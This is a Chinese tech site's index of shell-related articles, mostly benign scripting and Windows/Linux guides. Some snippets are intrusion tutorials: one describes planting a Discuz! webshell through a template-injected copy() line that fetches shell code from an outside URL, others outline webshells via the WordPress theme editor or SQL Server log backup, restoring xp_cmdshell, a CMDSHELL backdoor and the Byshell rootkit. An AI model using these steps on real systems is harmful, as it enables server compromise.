文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 国产软件 | 国外软件 | 汉化补丁 |
文章标题 整理日期 人气
Windows7常用shell命令解析[多图] 2011-5-31 8:04:50
Windows7系统相对以前版本的Windows系统,拥有更高的固定性、兼容性、天性化等等各式各样的服务。而Windows 7中的shell命令行,则是许多用户都没有发觉的又一主要更新,Windows 7 shell是Windows 7系统的控制台。关于熟识了命令行的人来说,用键盘调用顺序比鼠标更快更省力。         搜索框   &...
WMI中的Windows PowerShell脚本使用方法 2011-2-26 14:06:36
  Windows Management Instrumentation(WMI)是能够改动你日常生活的工具之一。虽然自90年代初期它就曾经存在,但是由于WMI的庞杂性,其推行速度十分迟缓。Windows PowerShell突破了这个障碍,它让WMI的运用更简单,这也改动了IT行业的相貌。    在咱们着重于琢磨如何用PowerShell来简化WMI之前,先让咱们来看一看什么是WMI。这是个...
实战Windows7系统的Powershell命令 2010-5-8 8:01:13
  命令提示符的运用频率虽然不高,但它在系统和网络维护,维护任务中起着主要的作用。在微软最新的windows7系统中也为我们带来了cmd的晋级版windows powershell,有了它计算机用户就可以更高效地维护系统了。终究windows powerShell为何物,它可以完成哪些任务呢?让我们一同来学习一下吧。   windows powerShell简介   windows powerShell是微软为windows系统...
linux shell数组赋值要领 2010-3-29 8:47:00
  Bash中,数组变量的赋值有两种要领 :   (1) name = (value1 ... valuen) 此时下标从0开端   (2) name[index] = value   上面 以一个基本 的脚本来表明 ,脚本内容如下:   #!/bin/bash   #解释数组   A=(a b c def)   #把数组按字符串显示输入   echo ${A[@]}   #屏幕显示:a b c d...
自动生成批量密码的shell脚本 2010-1-23 20:47:38
  linux环境下有一个密码生成器的小工具特别 好用(mkpasswd,须要 装一个软件包:exp ect-5.43.0-5.1.src.rpm),能够 根据自身 的须要 随机生成各种各样的密码:   mkpasswd -l 10 -d 3(密码长度为10个字符,其中含有3个数字)   生成单个密码的时刻 ,很基本 只要运行这个命令就能够 ,假如 是多个用户的密码呢?   能够 用以下的脚本来完成,...
以TXT为载体的数据交换运用 SHELL生成导数脚本实例 2010-1-18 2:02:30
  日常 一些数据交流,比如,各地保险行业协会与保险公司之间,很大一部分都是议决 文本形式 的,因为这种形式 特别 灵活,打个包,特别 易于后期处理!而假如 给你一个mdb,或者xls毕竟就没那么简单 完成 了,这些数据有时刻 可能都是几百万条记载 ,你能想像xls要如何 做吗?并且 ,你要把这些数据导入你的数据库,那你不得不为你这个再开发一个程序,多不划算啊!   可能你也会想假如 是文本不须要 开...
Discuz!的最新拿Webshell要领 2009-12-16 10:00:59
转载自t00ls.net 目前通吃所有DZ版本。1. 随便选一模板文件,挑选编辑2. 找一个空间上传一个webshell, 假定其地址为http://www.abc.com/shell.txt3. 在任意位置输入:{eval copy('http://www.abc.com/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}4. 保存, 刷新5. 访问该模板所属的文件6. 把模板还...
Discuz!的最新拿Webshell法 2009-12-7 7:08:16
  转自t00ls.net   目前通吃所有DZ版本。   1. 随便选一模板文件,选择编辑   2. 找一个空间上传一个webshell, 假定其地址为http://www.xxx.com/shell.txt   3. 在任意位置输入:   {eval copy('http://www.xxx.com/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}   4. 保存,...
SQLserver public backup log webshell 2009-12-3 17:51:51
前天帮死亡节奏提权一黑客站使用一种技术写出来大家分享。 测试环境:windows 2003 SQLserver 2000 mysql5.x 目标站点是asp,有shell的站点是aspx。shell的SQLserver2000权限是public。 使用工具:aspxIISpy马  专业操作SQLserver数据库马 使用aspxIISpy马得到目标路径,使用SQLserver马操作backup webshell。语句...
如何进入wordpress后台拿shell[多图] 2009-11-10 7:56:31
    昨天看到一个woredpress插件能注入的漏洞,兴冲冲的去试了多个 ,都是不能解开密码,或者权限不够load_file不能执行,爆不出路径,放弃之。但是想想如果拿到密码了又如何 拿shell呢?     后来一想很基本 噢。能编辑模板就能拿到shell.首先edit 模板,接着找php的文件。     接着备份下他...
用shell和java实现自动部署 2009-11-2 6:12:36
  公司用到了rackspace的cloudserver 做为压力测试的服务器,但是一旦启动就开始收费,一个小时0.4刀。因此要求用的时候打开,不用的时候关掉。   但是遇到一个疑问 就是,这样的话在上边部署运用 程序和软件就比较麻烦了,不能每次都重新部署吧,那样效率太低了。因此想到写一些脚本执行 自动的部署。其他的都好办,但是有些须要 修改xml文件和properties文件的,用shell实现起来就费力了。 ...
合理配置服务器 防止黑客Webshell[多图] 2009-10-29 10:45:41
  应当说,有一点网络安全的管理员,都会把从网上下载的站点 程序的默认数据库路径执行 修改 。当然也有一部分管理员非常粗心,拿到程序直接在自己的服务器上执行 安装,甚至连说明文件都不执行 删除,更不要说修改 数据库路径了。这样黑客就可以通过直接从源码站点下载站点 源程序,然后在本地测试找到默认的数据库,再通过下载数据库读取里面的用户信息和资料(一般是经过MD5加密的)找到管理入口执行 登陆获得w...
进入wordpress后台拿shell[多图] 2009-10-20 20:41:48
   看到一个woredpress插件能注入的漏洞,兴冲冲的去试了多个 ,都是不能解开密码,或者权限不够load_file不能执行,爆不出路径,放弃之。但是想想如果拿到密码了又如何 拿shell呢?     后来一想很基本 噢。能编辑模板就能拿到shell.首先edit 模板,接着找php的文件。     接着备份下他的内容,然后替换...
五个步骤帮你清除内核级木马程序Byshell 2009-10-20 16:47:16
Byshell是一个无进程、无DLL、无启动项的、集多种Rootkit技能特征的独立功能远程控制后门程序(Backdoor)。其运用 线程注射DLL到系统进程,解除DLL映射并删除自身文件和启动项,关机时恢复。它是内核级的木马程序,主要部分工作在Ring0,因此有很强的隐蔽性和杀伤力。 黑客通常用Byshell木马程序远程控制安装了Windows NT/2000/xp /2003操作系统的机器。当Byshell被安装在一台远...
Unix/Linux中的shell 机制 2009-10-20 6:23:29
    对于初次接触 Unix/Linux 系统的同学来说,Unix/Linux 系统与 Windows 系统最大的不同就是,操作 Unix/Linux 系统更多时候不是运用 GUI 图形界面而是运用 shell 命令行。那么,作为 Unix/Linux 系统的标志性建筑,shell 机制究竟是什么呢?     shell 是功能强大的命令解释程序,是 Unix/...
如何进入wordpress后台拿shell 2009-10-19 6:41:46
    昨天看到一个woredpress插件能注入的漏洞,兴冲冲的去试了多个,都是不能解开密码,或者权限不够load_file不能执行,爆不出路径,放弃之。但是想想如果拿到密码了又如何 拿shell呢?     后来一想很基本噢。能编辑模板就能拿到shell.首先edit 模板,接着找php的文件。     接着备份下他的内容,然后替换...
五个步骤帮你清除内核级木马程序Byshell 2009-10-14 22:50:12
来源:赛迪网   Byshell是一个无进程、无DLL、无启动项的、集多种Rootkit技能特征的独立功能远程控制后门程序(Backdoor)。其运用 线程注射DLL到系统进程,解除DLL映射并删除自身文件和启动项,关机时恢复。它是内核级的木马程序,主要部分工作在Ring0,因此有很强的隐蔽性和杀伤力。 黑客通常用Byshell木马程序远程控制安装了Windows NT/2000/xp /2003操作系统的...
启动Java运用 的Shell脚本的要领 2009-10-12 8:39:12
对于Java运用 程序(非web运用 ),在部署后,常常须要 一个启动脚本来加载一些第三方的jar包,并启动运用 。 对于java运用 程序,我一般喜欢将程序的目录结构写成如下的形式 : myapp ----lib ----bin ----packages 一些配置文件和属性文件 一个startup.sh、或bat启动脚本 其中,packages是程序的根包。其中有子包和c...
Webshell是如何 绕过防火墙提升权限的? 2009-6-26 8:17:13
  本文讲的重点是webshell权限的提升和绕过防火墙,老手 勿笑。   废话少说,咱们进入正题。   首先确定一下目标:http://www.sun***.com ,多见 的虚拟主机。运用 Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。站点 http://www.sun***.com/le...
从后台得到webshell十大技巧大汇总 2009-6-5 8:03:59
  前 言  动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小站点 仍然存在此漏洞。在拿站流程 中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到站点 webshell还有一步之遥,但还是有许多新手因想不出合适的要领 而被拒之门外。因此,我们把常用的从后台得...
Byshell后门:无进程无DLL无硬盘文件 2009-5-17 7:06:49
  现在网络上流行的木马后门类工具很多,但可以称为精品的则没有多少,大多数新手们还在运用 Radmin一类的软件来替代后门程序。不幸的是,它们并不是一个真实 的后门,极容易服务器管理员察觉,因此肉鸡经常飞掉也就很正常了。  一个合格的后门至少应该做到不能有陌生进程存在于任务管理器里,给后门进程起一个看起来像系统进程的名字只是掩耳盗铃;不能在注册表Run启动项或者服务启动项里留下众所周知的启动键...
ByShell 一个穿越主动防御的木马 2009-5-9 8:26:21
  《计算机 报》提到了一个可以轻轻松松 穿越卡巴,瑞星,诺顿的主动防御功能的免杀木马:byshell。于是在网上搜,搜到byshell推广版的说明是:可以穿越卡巴瑞星诺顿的默认配置 主动防御。我就下了个推广版回来试下微点能不能防,生成服务端后一运行,微点没有让人失望,立刻报告说发觉 未知监控软件。本来还想试下远程监控看看微点会不会提示有可疑程序访问网络之类的,因为在单位上班,还是放弃了念...
一个基本 的CMDSHELL后门 2009-4-24 7:01:07
  最近闲着无聊,自己琢磨着写了个基本 的CMDSHELL后门。同时也防止 了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的有关 文章。从中学到了很多知识。  程序很基本 ,运行后默认打开1983端口,也可以自己设定端口,等待客户端来连接。连接可以运用 nc。本来还想设计成服务让其开机后自动运行,由于时间疑问 等以后完备 了。  用法:smallhorse [-p port...
Windows 7 Shell命令与快捷键汇总 2009-4-14 11:44:31
  对于熟悉了命令行的人而言,用键盘调用程序往往比鼠标更快更省力,比如您可以用“Shell:”命令调用一切可以用资源管理器打开的项目,甚至是一次完成以前须要很多步骤才能完成的任务。   以下是一些关Windows 7的Shell 命令与快捷键。      Windows 7 适用的命令     shell:Libraries   shell:MusicLibrary   shell:VideosLibrary   shell:Oth...
最新奥运版MSN Shell完全体验[多图] 2008-7-19 19:07:12
  MSN Shell是深受不少朋友喜爱的Windows Live Messenger外挂插件之一,在网友群中一直拥有不错的口碑。但自从上次更新之后,这款小工具,已经很长时间没有再发新版本了。就在昨天,我们终于见到了最新的MSN Shell奥运版。那么,在这个全新版本中,到底都加入了哪些令人激动的改进?下面,还是看一看笔者的亲身体验吧。   MSN Shell 小档案 ——   * 软件版本:4.3.11.12   * 软件大小:4...
IIS7 的新功能 - URL重写、应用程序路由和负载均衡以及PowerShell Cmd-lets 2008-7-13 10:38:43
在过去几周里,IIS团队发布了3个IIS扩展更新l  URL Rewrite Module CTP1l  Application Request Routing CTP1l  PowerShell Provider CTP2 URL Rewrite Module URL Rewrite Module是一个基于规则的URL重写引擎,用于在URL被Web服务器处理之前改变请求的URL。对于动态W...
DB2 UDB V8.1安装和卸载的shell示例脚本 2008-7-10 9:15:37
在Linux平台下DB2 UDB V8.1图形界面的安装过程需要人工干预,耗时相对较长,并且在内核较新的Linux版本下还存在无法启动GUI安装界面的问题,虽然可以通过设置环境变量进行解决,还是显得有些麻烦。如果你用命令行方式手动安装,需要完成很多步骤,在安装或卸载比较频繁的情况下,就不如把整个安装过程写入shell脚本执行方便。 在Linux平台下DB2 UDB V8.1提供了命令行和图形界面两种安装方式,图形界面虽然通过交互...
Bourne shell编程入门及脚本测试 2008-6-24 23:21:11
  *****************************************************************************本文由正泰Linux http://linux-down.kmip.net 搜集,整理,如需转载,请注明出处!本站有大量的linux电子教程,软件,技术文档,欢迎大家访问!站长阿泰QQ:253222170*************************************...
千变万化恢复xp_cmdshell 2008-6-24 23:13:32
向XP_cmdshell进军——利用MSSQL数据库存储扩展取得服务器的管理权在MSSQL中具有sysadmin权限的用户可以通过xp_cmdshell存储扩展以system的权限执行任意系统命令,因此大多数对安全比较重视的管理员都会将它删除,即使没有删除也有可能会由于获得的权限不足而前功尽弃。因此获得了xp_cmdshell的执行权限也就成了大多数SQL Injection攻击方法的终极目标。我给大家介绍一下在此过程中涉及到的几个...
新制作的WinPE2.0(VistaPE)中文版,加了图形shell! 2008-5-28 21:07:02
2006-12-24 11:00 hmily3234 新制作的WinPE2.0(VistaPE)中文版,加了图形shell![color=blue]本PE基于Vista简体中文正式版(版本号6.0.6000.16386)[/color]    集成了卡巴司机杀毒(可在线升级,可惜现在不能升级)和其他常用工具。[b]特点:[/b]除了BSEXPlorer,WinRAR,卡巴斯基(主要考虑升级)等几个主要工具外...
Linux主要shell命令详解 2008-5-25 7:56:08
  shell是用户和Linux操作系统之间的接口。Linux中有多种shell,其中缺省使用的是Bash。本章讲述了shell的工作原理,shell的种类,shell的一般操作及Bash的特性。   什么是shell   Linux系统的shell作为操作系统的外壳,为用户提供使用操作系统的接口。它是命令语言、命令解释程序及程序设计语言的统称。   shell是用户和Linux内核之间的接口程序,如果把Linux内核想象成...
ASP.NET木马及Webshell安全解决方案 2007-10-29 20:38:29
ASP.NET木马及Webshell安全解决方案Security Fuard Solution Of ASP.NET and Webshell文章简介:本文将为大家介绍在Microsoft Win系列的2003 SERVER IIS6.0中如何简单快速解决ASP.NET中的危险漏洞与隐患对WEB服务器系统的安全威胁之详细防范设置步骤;读完本文,您将可以使您的网站服务器免去ASP.NET木马、Webshell所面对的提升权限、跨站攻击...
Do All in Cmd Shell (一切尽在命令行) 2007-10-4 10:10:14
目录 1,前言 2,文件传输 3,系统配置 4,网络配置 5,软件安装 6,Windows脚本 7,附言 前言 Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。 本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。 文件传输 对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所需要的139或445端口被路由...
安全方案:ASP木马Webshell的安全防范解决办法 2007-9-18 11:32:27
  注意:本文所讲述之设置方法与环境:适用于Microsoft windows 2000 Server/Win2003 SERVER IIS5.0/IIS6.0   1、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些?我们以海洋木马为列:   〈object runat="server" id="ws" scope="page" classid="clsid:72C24DD...
Linux中使用Shell脚本去掉源码注释的方法 2007-9-18 10:58:42
该文件用来终极删除注释,操作系统限Linux #!/bin/bash###the script use to delete comment if [ -z "$1" ];then                  #检测是否输入...
PHP Shell的编写(改进版) 2007-9-18 9:21:52
  以前写过一个没有任何技术含量的PHP CMD Shell,总是觉得功能很弱,并且对一些问题没有处理好,比如浏览目录等,后来深入学习PHP 后,发现了很多有趣的函数个,于是重新简单的编写了一个新的PHP Shell,希望大家喜欢! 程序介绍: 程序:PHP Web Shell版本:v0.4功能:1.可以支持目前主流的操作系统:&nb...
利用Log备份导出日志文件获取Webshell 2007-8-21 9:49:57
Blog被人渗透了一下,不知道各位掉了什么东西没有。原来有一次blog的目录可以列出来,那次我掉了一个小东西,然后今天别人告诉我NBSI 3用了那个东西的方法。呵呵,有点晕,就是下面的,成功率还是很高的,大家可以试试看。嗯,方法流出去无所谓,文章留着吧。 dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入...
监控Oracle数据库的常用shell脚本 2007-7-21 13:13:34
  前言   这篇文章介绍了DBA每天在监控Oracle数据库方面的职责,讲述了如何通过shell脚本来完成这些重复的监控工作。本文首先回顾了一...
将数据导出成为文本格式的备份的shell脚本 2007-7-21 12:53:27
#将数据库中表的内容导出成为一个文本格式的shell脚本 #有两种使用方法(假设这个脚本的名字叫做unload): # 1.将一个用户中所有的数据库表的内容到出来: ...
教你使用Linux的Shell脚本维护Oracle 2007-7-19 11:57:03
大约7 年前, Oracle 发布了 Linux 上的第一个商业数据库。从那时起, Oracle 、 Red Hat 和 Novell/SUSE 就不断地合作更改 Linux 内核,从而提高数据库和应用程序的性能。 ...
SHELL举例综合 2007-7-16 10:59:17
1、if语句2、交互选择3、循环判断4、数值运算符5、………… if语句格式:  if [ 条件 ]  then&n...
shell里的括号的用法 2007-7-16 10:57:07
  我一下子也想不起该起什么标题,就取了这样一个不太合适的标题。在这里我想说的是几种shell里的小括号,大括号结构和有括号的变量,命令的用法,如下: PHP代码: 1.$ 2.$(cmd) 3.()和{} 4.${var:-string},${var:+string},${var:=string},${var:?string} 5.$((eXP)) 6.$(var%pat...
windows下生成shell的一种新方法(2) 2007-7-12 15:27:01
  面是shell数据的初始化与shell的输出。shell中数据段是如何定位的。大家看看不被执行的那一段汇编程序,mov ebp,esp,使ebp指向shell的代码段(运行时)开始处。add ebp,0x11111111,使ebp的指针下移(0x11111111并不是最终值,这个0x11111111会前面的shell[4+i]=?处中被off覆盖,4是0x11111111在shell中的偏移量),...
用shell写守护进程(原创) 2007-6-23 2:32:16
   设想:用一个shell查看一个后台运行的PHP程序是否非正常退出 如果退出,利用守护进程自动restart. 类似mysql的safe_mysqld 共3个程序 shstart.sh  负责启动 sh.sh       守护进程主程序 shstop.sh   安全退出守护进...
用shell写守护进程 2007-6-23 2:23:59
设想:用一个shell查看一个后台运行的PHP程序是否非正常退出 如果退出,利用守护进程自动restart. 类似mysql的safe_mysqld 共3个程序 shstart.sh 负责启动 ...
一个快速自动安装Apache及其相关软件的Shell脚本 2007-6-23 1:21:01
  Apache是一个功能强大配置灵活的免费WWW服务器软件。虽然各种免费的Linux、bsd unix版本都提供了它的预先编译好的安装软件包,但大部分操作系统套件都只提供基本的软件,对于它的增强模块和支持软件都只提供部分预编译包或不提供预编译包,需要用户自己编译和配置这些套件。而且在许多情况下为了更高的效率和安全性,用户也不得不自己手工编译apache套件,这是一个相当复杂和麻烦的事情。用户自己编译了...
配置路由器和交换机上的安全Shell运行的Cisco IOS[图] 2007-6-10 23:39:00
  前言   本文讨论配置和调试安 全外壳(SSH)在运行的Cisco IOS软件的版本支持 SSH® Cisco 路由器或交换机。欲知关于特定 版本和软件镜象的,下面请参阅更多信息。     使 用的组件   本文的信息根 据以下的软件及硬件版本。     Cisco IOS 3600软件(C3640-IK9S-M),版本 12.2(2)T1     SSH介绍到 IOS platforms/...
Linux的Shell编程(1) 2007-6-10 22:21:05
其实作为命令语言互动式地解释和执行用户输入的命令只是Shell功能的一个方面,Shell还可以用来进行程序设计,它提供了定义变量和参数的手段以及丰富的程序控制结构。使用Shell编程类似于DOS中的批处理文件,称为Shell script,又叫Shell程序或Shell命令文件。 Shell基本语法 像高级程序设计语言一样,Shell也提供说明和使用变量的功能。对Shell来讲,所有变量的取值都是一个...
Shell高级屏幕输出 2007-6-10 22:17:16
对于在Shell下面编写屏幕程序,大家使用echo命令比较多,而且此命令也比较快。下面介绍的是另一方法,只是速度比较慢。要实现这一点,系统上需要一个彩色监视器和tput命令。 一.使用 在使用tput前,需要在脚本或命令行中使用tput命令初始化终端。 $ tput inittput产生三种不同的输出:字符型、数字型和布尔型(真/假)。/字符串输出/ 下面是大部分常用字符串:名字含义be...
BASH SHELL 程式设计简介 2007-6-10 22:17:07
  如同在 Linux 中其他的 shell,Bourne Again SHell 不只是一个优秀的指令行式的 shell,同时也提供 scripting 语言。Shell scripting 允许你完全利用 shell 的功能,将需要许多指令执行的多项工作自动化。在你的 Linux 机器上有许多程序是 shell 程序。如果你对学习他们如何运作,或修改他们感兴趣,基本要素是你必须了解 bash 的语法和...
Shell 系列 | 合计133条 | 共3页 | 第1页 上一页 [1] [2] [3] 下一页 尾页 跳转: